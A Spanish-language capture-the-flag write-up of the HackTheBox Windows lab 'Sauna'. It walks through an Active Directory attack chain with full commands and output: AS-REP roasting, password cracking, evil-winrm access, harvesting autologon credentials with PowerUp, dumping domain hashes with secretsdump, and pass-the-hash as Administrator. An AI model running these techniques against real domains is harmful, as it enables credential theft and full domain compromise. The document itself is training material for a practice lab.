Sauna es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Sauna 10.10.10.175 a /etc/hosts como sauna.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
# Nmap 7.80 scan initiated Mon May 11 13:08:47 2020 as: nmap -sV -Pn -p- -sC -oA sauna-nmap2 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.052s latency). Not shown: 65515 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-11 18:14:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49686/tcp open msrpc Microsoft Windows RPC 58183/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/11%Time=5EB932B6%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h03m33s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-11T18:16:35 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 11 13:15:38 2020 -- 1 IP address (1 host up) scanned in 411.58 seconds |
Una vez realizado el escaneo procedemos a revisar los diferentes puertos abiertos. Observamos que existe un AD bajo el dominio EGOTISTICAL-BANK.LOCAL que posiblemente nos ayude a obtener información del sistema, pero vamos a ir paso a paso investigando las posibles opciones.
Pasamos al puerto 80 donde vemos el siguiente portal web:
Investigamos un poco la web y tampoco vemos ningún vector posible. Buscamos acerca de alguna vulnerabilidad de IIS en la versión 10.0 aunque tampoco conseguimos demasiada información relevante del mismo.
Enumeración
Procedemos entonces a realizar diferentes enumeraciones en el servicio para intentar obtener datos suficientes para conseguir acceso a la máquina.
Utilizaremos como primera opción el script en perl enum4linux:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 |
$ enum4linux -a 10.10.10.175 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 11 15:54:35 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.175 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.175 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.175 | ============================================ Looking up status of 10.10.10.175 No reply from 10.10.10.175 ===================================== | Session Check on 10.10.10.175 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 10.10.10.175 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.175 | =========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: EGOTISTICALBANK Domain Sid: S-1-5-21-2966785786-3096785034-1186376766 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.175 | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.10.175 from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for 10.10.10.175 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.175 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. [E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED ========================================= | Share Enumeration on 10.10.10.175 | ========================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640. Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.10.175 ==================================================== | Password Policy Information for 10.10.10.175 | ==================================================== [E] Unexpected error from polenum: [+] Attaching to 10.10.10.175 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.10.175) [+] Trying protocol 445/SMB... [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501. [E] Failed to get password policy with rpcclient ============================== | Groups on 10.10.10.175 | ============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting builtin groups: [+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting local groups: [+] Getting local group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593. [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================= | Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742. ============================================= | Getting printer info for 10.10.10.175 | ============================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991. Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Mon May 11 15:55:10 2020 |
Aunque en este caso tampoco obtenemos demasiada información.
Seguimos investigando con diferentes herramientas y al final volvemos a la página web y observamos una serie de usuarios en la sección de team:
Así que vamos a crear una lista de usuarios e intentar descubrir si alguno de los mismos existe en el dominio existente y obtenemos el siguiente diccionario con algunas combinaciones:
1 2 3 4 5 6 7 8 9 10 11 12 |
fergussmith shauncoins bowietaylor sophiedriver hugobear stevenkerb fsmith scoins btaylor sdriver hbear skerb |
Utilizaremos la herramienta GetNPUsers.py incluida en la suite de impacker para intentar descubrir si alguno de los usuarios de nuestro diccionario existen en el dominio.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
$ GetNPUsers.py EGOTISTICAL-BANK.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.175 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0ad8638de81e3aa9d386ae89f2a11914$410104a97a281192fd9d5721c1f30edefc83a8b3cbac7aaa3fa5673c753bd2ab6b6937f619507a485f6ac12a2ad6ef2f68eeb206a50f1baaed14c9e97073ea16e4de6dd9f68926285dcb82f42ef52131554e65e9c91484f14795451b22c382533394ca9a9178e93d164f1d7c0978a2f590d7eac83599e79205cd73c7504cb949c2714fe7f224b8e8cb5f07bcc2014d6fcc8969f949be44a2f92e06dd6330f1c3c9bfee1aaba64830f5c9a29b81e8bece32b128b9acb025541db770689f1ce85b402677ac7f821f1288c3d3f441d0ffc13698d8254abe20ac17fc70504f3a1f7b8acddb6d85c8861cb6565a1459f1b2e8dd4279ee5d63b6b53956b14324a5465b [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) |
Y parece, que uno de ellos sí existe, además de obtener con la herramienta el hash de su contraseña:
1 |
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0ad8638de81e3aa9d386ae89f2a11914$410104a97a281192fd9d5721c1f30edefc83a8b3cbac7aaa3fa5673c753bd2ab6b6937f619507a485f6ac12a2ad6ef2f68eeb206a50f1baaed14c9e97073ea16e4de6dd9f68926285dcb82f42ef52131554e65e9c91484f14795451b22c382533394ca9a9178e93d164f1d7c0978a2f590d7eac83599e79205cd73c7504cb949c2714fe7f224b8e8cb5f07bcc2014d6fcc8969f949be44a2f92e06dd6330f1c3c9bfee1aaba64830f5c9a29b81e8bece32b128b9acb025541db770689f1ce85b402677ac7f821f1288c3d3f441d0ffc13698d8254abe20ac17fc70504f3a1f7b8acddb6d85c8861cb6565a1459f1b2e8dd4279ee5d63b6b53956b14324a5465b |
Con el hash obtenido utilizaremos la herramienta de John The Ripper para intentar descifrar el hash y obtener la contraseña en plano:
1 2 3 4 5 6 7 8 9 |
$ john --wordlist=/usr/share/wordlists/rockyou.txt fsmith.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:24 DONE (2020-05-11 16:37) 0.04125g/s 434777p/s 434777c/s 434777C/s Thing..Thehunter22 Use the "--show" option to display all of the cracked passwords reliably Session completed |
Para verificar la misma usamos la opción –show:
1 2 3 4 |
$john --show fsmith.hash $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:Thestrokes23 1 password hash cracked, 0 left |
Obteniendo la flag de user
Ahora que tenemos unas credenciales de acceso, utilizaremos la herramienta evil-winrm para intentar acceder a la máquina junto con el puerto 5985 descubierto para el servicio Microsoft HTTPAPI httpd:
1 2 3 4 5 6 7 8 9 |
$ ruby evil-winrm.rb -i 10.10.10.175 -u fsmith -p Thestrokes23 -P 5985 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\FSmith\Documents> whoami egotisticalbank\fsmith *Evil-WinRM* PS C:\Users\FSmith\Documents> |
Y estamos dentro, comprobamos si podemos obtener la flag en el escritorio del usuario y:
1 2 3 4 5 6 7 8 9 10 11 12 |
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd .. *Evil-WinRM* PS C:\Users\FSmith> cd desktop *Evil-WinRM* PS C:\Users\FSmith\desktop> dir Directory: C:\Users\FSmith\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/23/2020 10:03 AM 34 user.txt *Evil-WinRM* PS C:\Users\FSmith\desktop> |
Vale, ya tenemos la flag del usuario.
Escalado lateral
Ahora que tenemos el primer usuario, después de varias comprobaciones, parece que vamos a necesitar escalar privilegios a otro usuario antes de conseguir llegar a system.
Comprobamos que homes existen en el sistema, a fin de identificar a los posibles usuarios y descubrimos los siguientes:
1 2 3 4 5 6 |
fsmith hsmith svc_loanmgr Administrator krbtgt Guest |
Subiremos el script PowerUp de la suite de powertools para intentar enumerar las diferentes posiblidades existentes en el sistema:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
*Evil-WinRM* PS C:\Temp> upload /root/github/PowerTools/PowerUp/PowerUp.ps1 C:\Temp\powerup.ps1 Info: Uploading /root/github/PowerTools/PowerUp/PowerUp.ps1 to C:\Temp\powerup.ps1 Data: 659812 bytes of 659812 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Temp> dir Directory: C:\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/11/2020 2:59 PM 494860 powerup.ps1 *Evil-WinRM* PS C:\Temp> |
A continuación abrimos una consola de powershell, importamos el módulo y ejecutamos el chequeo:
1 2 3 4 5 6 7 |
*Evil-WinRM* PS C:\Temp> powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Temp> *Evil-WinRM* PS C:\Temp> Import-Module c:\Temp\powerup.ps1 *Evil-WinRM* PS C:\Temp> Invoke-AllChecks |
El cual nos dará el siguiente resultado:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
[*] Running Invoke-AllChecks [*] Checking if user is in a local group with administrative privileges... [*] Checking for unquoted service paths... Access denied At C:\Temp\powerup.ps1:457 char:21 + $VulnServices = Get-WmiObject -Class win32_service | Where-Object ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand [*] Checking service executable and argument permissions... Access denied At C:\Temp\powerup.ps1:488 char:5 + Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand [*] Checking service permissions... Access denied At C:\Temp\powerup.ps1:534 char:17 + $Services = Get-WmiObject -Class win32_service | Where-Object {$_ ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand [*] Checking %PATH% for potentially hijackable .dll locations... HijackablePath : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\ AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...' [*] Checking for AlwaysInstallElevated registry key... [*] Checking for Autologon credentials in registry... DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround! AltDefaultDomainName : AltDefaultUserName : AltDefaultPassword : [*] Checking for vulnerable registry autoruns and configs... [*] Checking for vulnerable schtask files/configs... [*] Checking for unattended install files... [*] Checking for encrypted web.config strings... [*] Checking for encrypted application pool and virtual directory passwords... |
En el cual obtenemos una cosa interesante, que parecen ser las credenciales del usuario svc_loanmgr, aunque no corresponde con el nombre obtenido en este caso:
1 2 3 |
DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround! |
Probamos el acceso con el usuario que vimos anteriormente y esta contraseña y estamos dentro:
1 2 3 4 5 6 7 8 9 |
$ ruby evil-winrm.rb -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! -P 5985 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami egotisticalbank\svc_loanmgr *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> |
Aunque este usuario tampoco dispone de permisos de administrador.
Escalado de privilegios
Continuando con la enumeración, utilizaremos ahora el script winPEAS.exe con la idea de obtener más información. Pego sólo una parte importante debido a la inmensa cantidad de información que devuelve el mismo:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
==============================(Interesting files and registry)============================== [+] Putty Sessions() Not Found [+] Putty SSH Host keys() Not Found [+] SSH keys in registry() [?] If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz /windows/windows-local-privilege-escalation#ssh-keys-in-registry Not Found [+] Cloud Credentials(T1538&T1083&T1081) [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files Not Found [+] Unnattend Files() [+] Looking for common SAM & SYSTEM backups() C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\RegBack\SYSTEM [+] Looking for McAfee Sitelist.xml Files() [+] Cached GPP Passwords() [X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'. [+] Looking for possible regs with creds(T1012&T1214) [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry Not Found Not Found Not Found Not Found [+] Looking for possible password files in users homes(T1083&T1081) [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml [+] Looking inside the Recycle Bin for creds files(T1083&T1081&T1145) [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files Not Found [+] Searching known files that can contain creds in home(T1083&T1081) [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files [+] Looking for documents --limit 100--(T1083) Not Found |
Donde vemos que tiene acceso a ciertos ficheros sensibles que podrían ser de mucha ayuda:
1 2 3 |
[+] Looking for common SAM & SYSTEM backups() C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\RegBack\SYSTEM |
Así que vamos a utilizar la herramienta secretsdump.py incluida también en la suite de impacket para intentar obtener un listado de los hashes de dominio para los usuarios existentes:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
$ secretsdump.py svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:9495fdc3d7471fc8dab4fbd657355e57::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0 Administrator:des-cbc-md5:19d5f15d689b1ce5 krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:ff8ac685ca912f261e2ca731820c3c5d8c0eddb80073a6a7c1d2f1dc60ccca96 SAUNA$:aes128-cts-hmac-sha1-96:75d137f4b4577aa0351a995753093f3d SAUNA$:des-cbc-md5:104c515b86739e08 [*] Cleaning up... |
Y tenemos un listado de hashes, donde entre otros, se encuentran las credenciales del usuario Administrator.
Obteniendo la flag de root
Con los hashes obtenidos, utilizaremos la herramienta wmiexec.py, también incluida en impacket para intentar acceder al sistema con el usuario Administrator:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami egotisticalbank\administrator C:\>cd users\administrator\desktop C:\users\administrator\desktop>dir Volume in drive C has no label. Volume Serial Number is 489C-D8FC Directory of C:\users\administrator\desktop 01/23/2020 04:11 PM <DIR> . 01/23/2020 04:11 PM <DIR> .. 01/23/2020 11:22 AM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 7,125,000,192 bytes free C:\users\administrator\desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace https://www.hackthebox.eu/home/users/profile/103792